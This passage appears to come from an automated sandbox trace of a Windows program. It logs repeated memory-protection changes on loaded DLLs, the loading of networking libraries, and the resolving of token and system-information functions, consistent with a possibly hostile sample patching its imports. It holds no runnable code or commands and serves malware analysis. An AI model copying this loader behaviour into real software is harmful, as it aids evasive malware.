NumberOfBytesToProtect=0x41e8c0, NewAccessProtection=0x20, OldAccessProtection=0x41e8f4 | out: BaseAddress=0x41e8bc*=0x772f1000, NumberOfBytesToProtect=0x41e8c0, OldAccessProtection=0x41e8f4*=0x4) returned 0x0 [0085.320] GetCurrentProcess () returned 0xffffffff [0085.320] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e8bc*=0x772f110c, NumberOfBytesToProtect=0x41e8c0, NewAccessProtection=0x4, OldAccessProtection=0x41e8f4 | out: BaseAddress=0x41e8bc*=0x772f1000, NumberOfBytesToProtect=0x41e8c0, OldAccessProtection=0x41e8f4*=0x20) returned 0x0 [0085.320] GetCurrentProcess () returned 0xffffffff [0085.320] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e8bc*=0x772f110c, NumberOfBytesToProtect=0x41e8c0, NewAccessProtection=0x20, OldAccessProtection=0x41e8f4 | out: BaseAddress=0x41e8bc*=0x772f1000, NumberOfBytesToProtect=0x41e8c0, OldAccessProtection=0x41e8f4*=0x4) returned 0x0 [0085.321] GetCurrentProcess () returned 0xffffffff [0085.321] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e8bc*=0x772f111c, NumberOfBytesToProtect=0x41e8c0, NewAccessProtection=0x4, OldAccessProtection=0x41e8f4 | out: BaseAddress=0x41e8bc*=0x772f1000, NumberOfBytesToProtect=0x41e8c0, OldAccessProtection=0x41e8f4*=0x20) returned 0x0 [0085.321] GetCurrentProcess () returned 0xffffffff [0085.321] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e8bc*=0x772f111c, NumberOfBytesToProtect=0x41e8c0, NewAccessProtection=0x20, OldAccessProtection=0x41e8f4 | out: BaseAddress=0x41e8bc*=0x772f1000, NumberOfBytesToProtect=0x41e8c0, OldAccessProtection=0x41e8f4*=0x4) returned 0x0 [0085.321] GetCurrentProcess () returned 0xffffffff [0085.321] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e8bc*=0x772f1120, NumberOfBytesToProtect=0x41e8c0, NewAccessProtection=0x4, OldAccessProtection=0x41e8f4 | out: BaseAddress=0x41e8bc*=0x772f1000, NumberOfBytesToProtect=0x41e8c0, OldAccessProtection=0x41e8f4*=0x20) returned 0x0 [0085.322] GetCurrentProcess () returned 0xffffffff [0085.322] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e8bc*=0x772f1120, NumberOfBytesToProtect=0x41e8c0, NewAccessProtection=0x20, OldAccessProtection=0x41e8f4 | out: BaseAddress=0x41e8bc*=0x772f1000, NumberOfBytesToProtect=0x41e8c0, OldAccessProtection=0x41e8f4*=0x4) returned 0x0 [0085.322] GetCurrentProcess () returned 0xffffffff [0085.322] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e8bc*=0x772f1124, NumberOfBytesToProtect=0x41e8c0, NewAccessProtection=0x4, OldAccessProtection=0x41e8f4 | out: BaseAddress=0x41e8bc*=0x772f1000, NumberOfBytesToProtect=0x41e8c0, OldAccessProtection=0x41e8f4*=0x20) returned 0x0 [0085.322] GetCurrentProcess () returned 0xffffffff [0085.322] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e8bc*=0x772f1124, NumberOfBytesToProtect=0x41e8c0, NewAccessProtection=0x20, OldAccessProtection=0x41e8f4 | out: BaseAddress=0x41e8bc*=0x772f1000, NumberOfBytesToProtect=0x41e8c0, OldAccessProtection=0x41e8f4*=0x4) returned 0x0 [0085.322] GetCurrentProcess () returned 0xffffffff [0085.322] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e8bc*=0x772f1138, NumberOfBytesToProtect=0x41e8c0, NewAccessProtection=0x4, OldAccessProtection=0x41e8f4 | out: BaseAddress=0x41e8bc*=0x772f1000, NumberOfBytesToProtect=0x41e8c0, OldAccessProtection=0x41e8f4*=0x20) returned 0x0 [0085.323] GetCurrentProcess () returned 0xffffffff [0085.323] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e8bc*=0x772f1138, NumberOfBytesToProtect=0x41e8c0, NewAccessProtection=0x20, OldAccessProtection=0x41e8f4 | out: BaseAddress=0x41e8bc*=0x772f1000, NumberOfBytesToProtect=0x41e8c0, OldAccessProtection=0x41e8f4*=0x4) returned 0x0 [0085.323] GetCurrentProcess () returned 0xffffffff [0085.323] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e8bc*=0x772f11b8, NumberOfBytesToProtect=0x41e8c0, NewAccessProtection=0x4, OldAccessProtection=0x41e8f4 | out: BaseAddress=0x41e8bc*=0x772f1000, NumberOfBytesToProtect=0x41e8c0, OldAccessProtection=0x41e8f4*=0x20) returned 0x0 [0085.323] GetCurrentProcess () returned 0xffffffff [0085.323] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e8bc*=0x772f11b8, NumberOfBytesToProtect=0x41e8c0, NewAccessProtection=0x20, OldAccessProtection=0x41e8f4 | out: BaseAddress=0x41e8bc*=0x772f1000, NumberOfBytesToProtect=0x41e8c0, OldAccessProtection=0x41e8f4*=0x4) returned 0x0 [0085.324] GetCurrentProcess () returned 0xffffffff [0085.324] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e8bc*=0x772f11c0, NumberOfBytesToProtect=0x41e8c0, NewAccessProtection=0x4, OldAccessProtection=0x41e8f4 | out: BaseAddress=0x41e8bc*=0x772f1000, NumberOfBytesToProtect=0x41e8c0, OldAccessProtection=0x41e8f4*=0x20) returned 0x0 [0085.324] GetCurrentProcess () returned 0xffffffff [0085.324] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e8bc*=0x772f11c0, NumberOfBytesToProtect=0x41e8c0, NewAccessProtection=0x20, OldAccessProtection=0x41e8f4 | out: BaseAddress=0x41e8bc*=0x772f1000, NumberOfBytesToProtect=0x41e8c0, OldAccessProtection=0x41e8f4*=0x4) returned 0x0 [0085.324] GetCurrentProcess () returned 0xffffffff [0085.324] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e8bc*=0x772f11c8, NumberOfBytesToProtect=0x41e8c0, NewAccessProtection=0x4, OldAccessProtection=0x41e8f4 | out: BaseAddress=0x41e8bc*=0x772f1000, NumberOfBytesToProtect=0x41e8c0, OldAccessProtection=0x41e8f4*=0x20) returned 0x0 [0085.324] GetCurrentProcess () returned 0xffffffff [0085.324] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e8bc*=0x772f11c8, NumberOfBytesToProtect=0x41e8c0, NewAccessProtection=0x20, OldAccessProtection=0x41e8f4 | out: BaseAddress=0x41e8bc*=0x772f1000, NumberOfBytesToProtect=0x41e8c0, OldAccessProtection=0x41e8f4*=0x4) returned 0x0 [0085.325] GetProcAddress (hModule=0x772f0000, lpProcName="StrRChrA") returned 0x772fccf5 [0085.325] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0xb21ba4, cbMultiByte=12, lpWideCharStr=0x41d958, cchWideChar=2047 | out: lpWideCharStr="ADVAPI32.dll冒瞔?A𥳐矆\x80") returned 12 [0085.326] SysReAllocStringLen (in: pbstr=0x41e95c*=0x0, psz="ADVAPI32.dll", len=0xc | out: pbstr=0x41e95c*="ADVAPI32.dll") returned 1 [0085.326] CharLowerBuffW (in: lpsz="ADVAPI32.dll", cchLength=0xc | out: lpsz="advapi32.dll") returned 0xc [0085.326] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x77710000 [0085.326] GetLastError () returned 0x0 [0085.326] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e948*=0x77711520, NumberOfBytesToProtect=0x41e94c, NewAccessProtection=0x4, OldAccessProtection=0x41e980 | out: BaseAddress=0x41e948*=0x77711000, NumberOfBytesToProtect=0x41e94c, OldAccessProtection=0x41e980*=0x20) returned 0x0 [0085.327] GetCurrentProcess () returned 0xffffffff [0085.327] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e948*=0x77711520, NumberOfBytesToProtect=0x41e94c, NewAccessProtection=0x20, OldAccessProtection=0x41e980 | out: BaseAddress=0x41e948*=0x77711000, NumberOfBytesToProtect=0x41e94c, OldAccessProtection=0x41e980*=0x4) returned 0x0 [0085.327] GetCurrentProcess () returned 0xffffffff [0085.327] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e948*=0x77711540, NumberOfBytesToProtect=0x41e94c, NewAccessProtection=0x4, OldAccessProtection=0x41e980 | out: BaseAddress=0x41e948*=0x77711000, NumberOfBytesToProtect=0x41e94c, OldAccessProtection=0x41e980*=0x20) returned 0x0 [0085.327] GetCurrentProcess () returned 0xffffffff [0085.327] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e948*=0x77711540, NumberOfBytesToProtect=0x41e94c, NewAccessProtection=0x20, OldAccessProtection=0x41e980 | out: BaseAddress=0x41e948*=0x77711000, NumberOfBytesToProtect=0x41e94c, OldAccessProtection=0x41e980*=0x4) returned 0x0 [0085.328] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e948*=0x7771175c, NumberOfBytesToProtect=0x41e94c, NewAccessProtection=0x4, OldAccessProtection=0x41e980 | out: BaseAddress=0x41e948*=0x77711000, NumberOfBytesToProtect=0x41e94c, OldAccessProtection=0x41e980*=0x20) returned 0x0 [0085.328] GetCurrentProcess () returned 0xffffffff [0085.328] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e948*=0x7771175c, NumberOfBytesToProtect=0x41e94c, NewAccessProtection=0x20, OldAccessProtection=0x41e980 | out: BaseAddress=0x41e948*=0x77711000, NumberOfBytesToProtect=0x41e94c, OldAccessProtection=0x41e980*=0x4) returned 0x0 [0085.328] GetCurrentProcess () returned 0xffffffff [0085.328] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e948*=0x77711768, NumberOfBytesToProtect=0x41e94c, NewAccessProtection=0x4, OldAccessProtection=0x41e980 | out: BaseAddress=0x41e948*=0x77711000, NumberOfBytesToProtect=0x41e94c, OldAccessProtection=0x41e980*=0x20) returned 0x0 [0085.329] GetCurrentProcess () returned 0xffffffff [0085.329] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e948*=0x77711768, NumberOfBytesToProtect=0x41e94c, NewAccessProtection=0x20, OldAccessProtection=0x41e980 | out: BaseAddress=0x41e948*=0x77711000, NumberOfBytesToProtect=0x41e94c, OldAccessProtection=0x41e980*=0x4) returned 0x0 [0085.329] GetCurrentProcess () returned 0xffffffff [0085.329] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e948*=0x777117b8, NumberOfBytesToProtect=0x41e94c, NewAccessProtection=0x4, OldAccessProtection=0x41e980 | out: BaseAddress=0x41e948*=0x77711000, NumberOfBytesToProtect=0x41e94c, OldAccessProtection=0x41e980*=0x20) returned 0x0 [0085.329] GetCurrentProcess () returned 0xffffffff [0085.329] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e948*=0x777117b8, NumberOfBytesToProtect=0x41e94c, NewAccessProtection=0x20, OldAccessProtection=0x41e980 | out: BaseAddress=0x41e948*=0x77711000, NumberOfBytesToProtect=0x41e94c, OldAccessProtection=0x41e980*=0x4) returned 0x0 [0085.330] GetCurrentProcess () returned 0xffffffff [0085.330] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e948*=0x777117bc, NumberOfBytesToProtect=0x41e94c, NewAccessProtection=0x4, OldAccessProtection=0x41e980 | out: BaseAddress=0x41e948*=0x77711000, NumberOfBytesToProtect=0x41e94c, OldAccessProtection=0x41e980*=0x20) returned 0x0 [0085.330] GetCurrentProcess () returned 0xffffffff [0085.330] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e948*=0x777117bc, NumberOfBytesToProtect=0x41e94c, NewAccessProtection=0x20, OldAccessProtection=0x41e980 | out: BaseAddress=0x41e948*=0x77711000, NumberOfBytesToProtect=0x41e94c, OldAccessProtection=0x41e980*=0x4) returned 0x0 [0085.330] GetCurrentProcess () returned 0xffffffff [0085.331] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e948*=0x777117c8, NumberOfBytesToProtect=0x41e94c, NewAccessProtection=0x4, OldAccessProtection=0x41e980 | out: BaseAddress=0x41e948*=0x77711000, NumberOfBytesToProtect=0x41e94c, OldAccessProtection=0x41e980*=0x20) returned 0x0 [0085.331] GetCurrentProcess () returned 0xffffffff [0085.331] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e948*=0x777117c8, NumberOfBytesToProtect=0x41e94c, NewAccessProtection=0x20, OldAccessProtection=0x41e980 | out: BaseAddress=0x41e948*=0x77711000, NumberOfBytesToProtect=0x41e94c, OldAccessProtection=0x41e980*=0x4) returned 0x0 [0085.331] GetCurrentProcess () returned 0xffffffff [0085.331] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e948*=0x777117d0, NumberOfBytesToProtect=0x41e94c, NewAccessProtection=0x4, OldAccessProtection=0x41e980 | out: BaseAddress=0x41e948*=0x77711000, NumberOfBytesToProtect=0x41e94c, OldAccessProtection=0x41e980*=0x20) returned 0x0 [0085.331] GetCurrentProcess () returned 0xffffffff [0085.332] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e948*=0x777117d0, NumberOfBytesToProtect=0x41e94c, NewAccessProtection=0x20, OldAccessProtection=0x41e980 | out: BaseAddress=0x41e948*=0x77711000, NumberOfBytesToProtect=0x41e94c, OldAccessProtection=0x41e980*=0x4) returned 0x0 [0085.332] GetCurrentProcess () returned 0xffffffff [0085.332] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e948*=0x7771180c, NumberOfBytesToProtect=0x41e94c, NewAccessProtection=0x4, OldAccessProtection=0x41e980 | out: BaseAddress=0x41e948*=0x77711000, NumberOfBytesToProtect=0x41e94c, OldAccessProtection=0x41e980*=0x20) returned 0x0 [0085.332] GetCurrentProcess () returned 0xffffffff [0085.332] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e948*=0x7771180c, NumberOfBytesToProtect=0x41e94c, NewAccessProtection=0x20, OldAccessProtection=0x41e980 | out: BaseAddress=0x41e948*=0x77711000, NumberOfBytesToProtect=0x41e94c, OldAccessProtection=0x41e980*=0x4) returned 0x0 [0085.333] GetCurrentProcess () returned 0xffffffff [0085.333] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e948*=0x7771182c, NumberOfBytesToProtect=0x41e94c, NewAccessProtection=0x4, OldAccessProtection=0x41e980 | out: BaseAddress=0x41e948*=0x77711000, NumberOfBytesToProtect=0x41e94c, OldAccessProtection=0x41e980*=0x20) returned 0x0 [0085.333] GetCurrentProcess () returned 0xffffffff [0085.333] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e948*=0x7771182c, NumberOfBytesToProtect=0x41e94c, NewAccessProtection=0x20, OldAccessProtection=0x41e980 | out: BaseAddress=0x41e948*=0x77711000, NumberOfBytesToProtect=0x41e94c, OldAccessProtection=0x41e980*=0x4) returned 0x0 [0085.333] GetCurrentProcess () returned 0xffffffff [0085.333] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e948*=0x77711860, NumberOfBytesToProtect=0x41e94c, NewAccessProtection=0x4, OldAccessProtection=0x41e980 | out: BaseAddress=0x41e948*=0x77711000, NumberOfBytesToProtect=0x41e94c, OldAccessProtection=0x41e980*=0x20) returned 0x0 [0085.334] GetCurrentProcess () returned 0xffffffff [0085.334] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e948*=0x77711860, NumberOfBytesToProtect=0x41e94c, NewAccessProtection=0x20, OldAccessProtection=0x41e980 | out: BaseAddress=0x41e948*=0x77711000, NumberOfBytesToProtect=0x41e94c, OldAccessProtection=0x41e980*=0x4) returned 0x0 [0085.334] GetProcAddress (hModule=0x77710000, lpProcName="OpenThreadToken") returned 0x7772432c [0085.335] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0xb21ba4, cbMultiByte=11, lpWideCharStr=0x41d820, cchWideChar=2047 | out: lpWideCharStr="winhttp.dll示?A⹼盃Љ") returned 11 [0085.335] SysReAllocStringLen (in: pbstr=0x41e824*=0x0, psz="winhttp.dll", len=0xb | out: pbstr=0x41e824*="winhttp.dll") returned 1 [0085.335] CharLowerBuffW (in: lpsz="winhttp.dll", cchLength=0xb | out: lpsz="winhttp.dll") returned 0xb [0085.335] LoadLibraryA (lpLibFileName="winhttp.dll") returned 0x74890000 [0085.335] GetLastError () returned 0x0 [0085.335] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e808*=0x74891170, NumberOfBytesToProtect=0x41e80c, NewAccessProtection=0x4, OldAccessProtection=0x41e840 | out: BaseAddress=0x41e808*=0x74891000, NumberOfBytesToProtect=0x41e80c, OldAccessProtection=0x41e840*=0x20) returned 0x0 [0085.336] GetCurrentProcess () returned 0xffffffff [0085.336] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e808*=0x74891170, NumberOfBytesToProtect=0x41e80c, NewAccessProtection=0x20, OldAccessProtection=0x41e840 | out: BaseAddress=0x41e808*=0x74891000, NumberOfBytesToProtect=0x41e80c, OldAccessProtection=0x41e840*=0x4) returned 0x0 [0085.336] GetCurrentProcess () returned 0xffffffff [0085.336] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e808*=0x748911a4, NumberOfBytesToProtect=0x41e80c, NewAccessProtection=0x4, OldAccessProtection=0x41e840 | out: BaseAddress=0x41e808*=0x74891000, NumberOfBytesToProtect=0x41e80c, OldAccessProtection=0x41e840*=0x20) returned 0x0 [0085.336] GetCurrentProcess () returned 0xffffffff [0085.336] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e808*=0x748911a4, NumberOfBytesToProtect=0x41e80c, NewAccessProtection=0x20, OldAccessProtection=0x41e840 | out: BaseAddress=0x41e808*=0x74891000, NumberOfBytesToProtect=0x41e80c, OldAccessProtection=0x41e840*=0x4) returned 0x0 [0085.337] GetCurrentProcess () returned 0xffffffff [0085.337] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e808*=0x748911dc, NumberOfBytesToProtect=0x41e80c, NewAccessProtection=0x4, OldAccessProtection=0x41e840 | out: BaseAddress=0x41e808*=0x74891000, NumberOfBytesToProtect=0x41e80c, OldAccessProtection=0x41e840*=0x20) returned 0x0 [0085.337] GetCurrentProcess () returned 0xffffffff [0085.337] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e808*=0x748911dc, NumberOfBytesToProtect=0x41e80c, NewAccessProtection=0x20, OldAccessProtection=0x41e840 | out: BaseAddress=0x41e808*=0x74891000, NumberOfBytesToProtect=0x41e80c, OldAccessProtection=0x41e840*=0x4) returned 0x0 [0085.337] GetCurrentProcess () returned 0xffffffff [0085.337] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e808*=0x748911ec, NumberOfBytesToProtect=0x41e80c, NewAccessProtection=0x4, OldAccessProtection=0x41e840 | out: BaseAddress=0x41e808*=0x74891000, NumberOfBytesToProtect=0x41e80c, OldAccessProtection=0x41e840*=0x20) returned 0x0 [0085.338] GetCurrentProcess () returned 0xffffffff [0085.338] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e808*=0x748911ec, NumberOfBytesToProtect=0x41e80c, NewAccessProtection=0x20, OldAccessProtection=0x41e840 | out: BaseAddress=0x41e808*=0x74891000, NumberOfBytesToProtect=0x41e80c, OldAccessProtection=0x41e840*=0x4) returned 0x0 [0085.338] GetCurrentProcess () returned 0xffffffff [0085.338] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e808*=0x74891224, NumberOfBytesToProtect=0x41e80c, NewAccessProtection=0x4, OldAccessProtection=0x41e840 | out: BaseAddress=0x41e808*=0x74891000, NumberOfBytesToProtect=0x41e80c, OldAccessProtection=0x41e840*=0x20) returned 0x0 [0085.338] GetCurrentProcess () returned 0xffffffff [0085.338] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e808*=0x74891224, NumberOfBytesToProtect=0x41e80c, NewAccessProtection=0x20, OldAccessProtection=0x41e840 | out: BaseAddress=0x41e808*=0x74891000, NumberOfBytesToProtect=0x41e80c, OldAccessProtection=0x41e840*=0x4) returned 0x0 [0085.339] GetCurrentProcess () returned 0xffffffff [0085.339] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e808*=0x74891268, NumberOfBytesToProtect=0x41e80c, NewAccessProtection=0x4, OldAccessProtection=0x41e840 | out: BaseAddress=0x41e808*=0x74891000, NumberOfBytesToProtect=0x41e80c, OldAccessProtection=0x41e840*=0x20) returned 0x0 [0085.339] GetCurrentProcess () returned 0xffffffff [0085.339] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e808*=0x74891268, NumberOfBytesToProtect=0x41e80c, NewAccessProtection=0x20, OldAccessProtection=0x41e840 | out: BaseAddress=0x41e808*=0x74891000, NumberOfBytesToProtect=0x41e80c, OldAccessProtection=0x41e840*=0x4) returned 0x0 [0085.339] GetCurrentProcess () returned 0xffffffff [0085.339] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e808*=0x74891280, NumberOfBytesToProtect=0x41e80c, NewAccessProtection=0x4, OldAccessProtection=0x41e840 | out: BaseAddress=0x41e808*=0x74891000, NumberOfBytesToProtect=0x41e80c, OldAccessProtection=0x41e840*=0x20) returned 0x0 [0085.339] GetCurrentProcess () returned 0xffffffff [0085.339] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e808*=0x74891280, NumberOfBytesToProtect=0x41e80c, NewAccessProtection=0x20, OldAccessProtection=0x41e840 | out: BaseAddress=0x41e808*=0x74891000, NumberOfBytesToProtect=0x41e80c, OldAccessProtection=0x41e840*=0x4) returned 0x0 [0085.340] GetCurrentProcess () returned 0xffffffff [0085.340] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e808*=0x74891288, NumberOfBytesToProtect=0x41e80c, NewAccessProtection=0x4, OldAccessProtection=0x41e840 | out: BaseAddress=0x41e808*=0x74891000, NumberOfBytesToProtect=0x41e80c, OldAccessProtection=0x41e840*=0x20) returned 0x0 [0085.340] GetCurrentProcess () returned 0xffffffff [0085.340] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e808*=0x74891288, NumberOfBytesToProtect=0x41e80c, NewAccessProtection=0x20, OldAccessProtection=0x41e840 | out: BaseAddress=0x41e808*=0x74891000, NumberOfBytesToProtect=0x41e80c, OldAccessProtection=0x41e840*=0x4) returned 0x0 [0085.340] GetCurrentProcess () returned 0xffffffff [0085.340] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e808*=0x74891290, NumberOfBytesToProtect=0x41e80c, NewAccessProtection=0x4, OldAccessProtection=0x41e840 | out: BaseAddress=0x41e808*=0x74891000, NumberOfBytesToProtect=0x41e80c, OldAccessProtection=0x41e840*=0x20) returned 0x0 [0085.341] GetCurrentProcess () returned 0xffffffff [0085.341] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e808*=0x74891290, NumberOfBytesToProtect=0x41e80c, NewAccessProtection=0x20, OldAccessProtection=0x41e840 | out: BaseAddress=0x41e808*=0x74891000, NumberOfBytesToProtect=0x41e80c, OldAccessProtection=0x41e840*=0x4) returned 0x0 [0085.341] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0xb21ba4, cbMultiByte=10, lpWideCharStr=0x41d7b0, cchWideChar=2047 | out: lpWideCharStr="WS2_32.dll\x0b") returned 10 [0085.341] SysReAllocStringLen (in: pbstr=0x41e7b4*=0x0, psz="WS2_32.dll", len=0xa | out: pbstr=0x41e7b4*="WS2_32.dll") returned 1 [0085.341] CharLowerBuffW (in: lpsz="WS2_32.dll", cchLength=0xa | out: lpsz="ws2_32.dll") returned 0xa [0085.342] LoadLibraryExA (lpLibFileName="WS2_32.dll", hFile=0x0, dwFlags=0x0) returned 0x77230000 [0085.342] GetLastError () returned 0x0 [0085.342] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e7a0*=0x77231224, NumberOfBytesToProtect=0x41e7a4, NewAccessProtection=0x4, OldAccessProtection=0x41e7d8 | out: BaseAddress=0x41e7a0*=0x77231000, NumberOfBytesToProtect=0x41e7a4, OldAccessProtection=0x41e7d8*=0x20) returned 0x0 [0085.342] GetCurrentProcess () returned 0xffffffff [0085.342] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e7a0*=0x77231224, NumberOfBytesToProtect=0x41e7a4, NewAccessProtection=0x20, OldAccessProtection=0x41e7d8 | out: BaseAddress=0x41e7a0*=0x77231000, NumberOfBytesToProtect=0x41e7a4, OldAccessProtection=0x41e7d8*=0x4) returned 0x0 [0085.343] GetCurrentProcess () returned 0xffffffff [0085.343] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e7a0*=0x7723123c, NumberOfBytesToProtect=0x41e7a4, NewAccessProtection=0x4, OldAccessProtection=0x41e7d8 | out: BaseAddress=0x41e7a0*=0x77231000, NumberOfBytesToProtect=0x41e7a4, OldAccessProtection=0x41e7d8*=0x20) returned 0x0 [0085.343] GetCurrentProcess () returned 0xffffffff [0085.343] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e7a0*=0x7723123c, NumberOfBytesToProtect=0x41e7a4, NewAccessProtection=0x20, OldAccessProtection=0x41e7d8 | out: BaseAddress=0x41e7a0*=0x77231000, NumberOfBytesToProtect=0x41e7a4, OldAccessProtection=0x41e7d8*=0x4) returned 0x0 [0085.343] GetProcAddress (hModule=0x77230000, lpProcName=0x73) returned 0x77233ab2 [0085.344] SysReAllocStringLen (in: pbstr=0x41e66c*=0x0, psz="kernel32.dll", len=0xc | out: pbstr=0x41e66c*="kernel32.dll") returned 1 [0085.344] CharLowerBuffW (in: lpsz="kernel32.dll", cchLength=0xc | out: lpsz="kernel32.dll") returned 0xc [0085.365] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0085.366] SysReAllocStringLen (in: pbstr=0x41e66c*=0x0, psz="ntdll.dll", len=0x9 | out: pbstr=0x41e66c*="ntdll.dll") returned 1 [0085.366] CharLowerBuffW (in: lpsz="ntdll.dll", cchLength=0x9 | out: lpsz="ntdll.dll") returned 0x9 [0085.366] GetModuleHandleW (lpModuleName="ntdll.dll") returned 0x77c40000 [0085.369] GetProcAddress (hModule=0x76d30000, lpProcName="SetSystemFileCacheSize") returned 0x76dce379 [0085.369] GetProcAddress (hModule=0x77c40000, lpProcName="NtSetSystemInformation") returned 0x77c61bd4 [0085.372] GetProcAddress (hModule=0x76d30000, lpProcName="PrivIsDllSynchronizationHeld") returned 0x0 [0085.374] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0xb21ba4, cbMultiByte=10, lpWideCharStr=0x41d55c, cchWideChar=2047 | out: lpWideCharStr="WS2_32.dllᝌ") returned 10 [0085.374] SysReAllocStringLen (in: pbstr=0x41e560*=0x0, psz="WS2_32.dll", len=0xa | out: pbstr=0x41e560*="WS2_32.dll") returned 1 [0085.374] CharLowerBuffW (in: lpsz="WS2_32.dll", cchLength=0xa | out: lpsz="ws2_32.dll") returned 0xa [0085.374] LoadLibraryExA (lpLibFileName="WS2_32.dll", hFile=0x0, dwFlags=0x0) returned 0x77230000 [0085.375] GetLastError () returned 0x0 [0085.375] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e54c*=0x77231224, NumberOfBytesToProtect=0x41e550, NewAccessProtection=0x4, OldAccessProtection=0x41e584 | out: BaseAddress=0x41e54c*=0x77231000, NumberOfBytesToProtect=0x41e550, OldAccessProtection=0x41e584*=0x20) returned 0x0 [0085.375] GetCurrentProcess () returned 0xffffffff [0085.375] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e54c*=0x77231224, NumberOfBytesToProtect=0x41e550, NewAccessProtection=0x20, OldAccessProtection=0x41e584 | out: BaseAddress=0x41e54c*=0x77231000, NumberOfBytesToProtect=0x41e550, OldAccessProtection=0x41e584*=0x4) returned 0x0 [0085.376] GetCurrentProcess () returned 0xffffffff [0085.376] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e54c*=0x7723123c, NumberOfBytesToProtect=0x41e550, NewAccessProtection=0x4, OldAccessProtection=0x41e584 | out: BaseAddress=0x41e54c*=0x77231000, NumberOfBytesToProtect=0x41e550, OldAccessProtection=0x41e584*=0x20) returned 0x0 [0085.376] GetCurrentProcess () returned 0xffffffff [0085.376] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x41e54c*=0x7723123c, NumberOfBytesToProtect=0x41e550, NewAccessProtection=0x20, OldAccessProtection=0x41e584 | out: 